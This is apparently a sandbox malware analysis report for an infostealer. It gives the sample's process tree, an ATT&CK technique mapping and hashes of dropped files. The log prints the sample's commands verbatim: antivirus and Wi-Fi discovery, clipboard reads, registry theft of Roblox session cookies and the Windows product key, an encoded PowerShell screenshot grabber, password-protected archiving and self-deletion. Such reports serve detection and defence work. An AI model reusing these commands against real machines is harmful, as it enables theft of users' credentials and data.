    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1652
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4520
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1672
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3104
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2612
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:536
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1yjc2sdg\1yjc2sdg.cmdline"
        5⤵
        
        PID:2024
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8695.tmp" "c:\Users\Admin\AppData\Local\Temp\1yjc2sdg\CSC3844F1BC2F594534A24A9772B5BF5E90.TMP"
        6⤵
        
        PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1428
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2044
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1120
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:432
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2348
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3964
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1772
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2596
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2336
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44482\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3VZil.zip" *"
    3⤵
    PID:3656
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:432
  - - C:\Users\Admin\AppData\Local\Temp\_MEI44482\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI44482\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3VZil.zip" *
      4⤵
      Executes dropped EXE
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\92cb45b3ce00b787c36bd55b0787b63941e08ad7b0e185adbcfc9f070dc638a3.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:224
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cae60f0ddddac635da71bba775a2c5b4

SHA1
386f1a036af61345a7d303d45f5230e2df817477

SHA256
b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

SHA512
28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c913d126db085fa635501f5fc7ebaf7

SHA1
c3026843f104c35b04d671e106b498294df210fb

SHA256
45b5a6840d6bbaf77e5cbcd8d95900ed5686463d8cd9d0d64f9bb75013212578

SHA512
9570c10612e69a9290bbe00814838cc98532b7b88b39226c0edd9f7e4a43345be6c80bac78817bcf2251dd6ae474d2ca0af8d7198e4055271eb2420f9d18e8ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1yjc2sdg\1yjc2sdg.dll

Filesize
4KB

MD5
d34c87d63d77bfe81d06f234be44c4b8

SHA1
5edc558e773dfa012c2895e9d4c8fd9f9dac8a71

SHA256
accef1fad9c70ff1cb94e6962c3e0c2bcc40b3802e2c0ab8cb6911dde89bba30

SHA512
15e99e59538baa843891ac405943724d26b66dcd7e56ebd55fd3046a52c69bf8c1d83d29b60b9d90b7e4a87a3b84c611359c48de235529115a740579dbd5d898

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8695.tmp

Filesize
1KB

MD5
c8d52949831c173977e85fa0f8ea61ae

SHA1
ce22458942187ea8393b4da4769eead63b726e94

SHA256
9e2e1b563b96118efe150c1796b5306d782393190aa2a7a2b13315b22e7767f8

SHA512
c3553d2ac38553949d0a75ac6e966528a4824a7602142443a64646a4b74f94fe7fb369b602b7e9e0886d6fe97ee27dfb9e926e96245286119f4640a75cce447f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44482\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44482\_bz2.pyd

Filesize
48KB

MD5
c413931b63def8c71374d7826fbf3ab4

SHA1
8b93087be080734db3399dc415cc5c875de857e2

SHA256
17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

SHA512
7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44482\_ctypes.pyd

Filesize
58KB

MD5
00f75daaa7f8a897f2a330e00fad78ac

SHA1
44aec43e5f8f1282989b14c4e3bd238c45d6e334

SHA256
9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

SHA512
f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44482\_decimal.pyd

Filesize
106KB

MD5
e3fb8bf23d857b1eb860923ccc47baa5

SHA1
46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

SHA256
7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

SHA512
7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44482\_hashlib.pyd

Filesize
35KB

MD5
b227bf5d9fec25e2b36d416ccd943ca3

SHA1
4fae06f24a1b61e6594747ec934cbf06e7ec3773

SHA256
d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

SHA512
c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

Download Submit
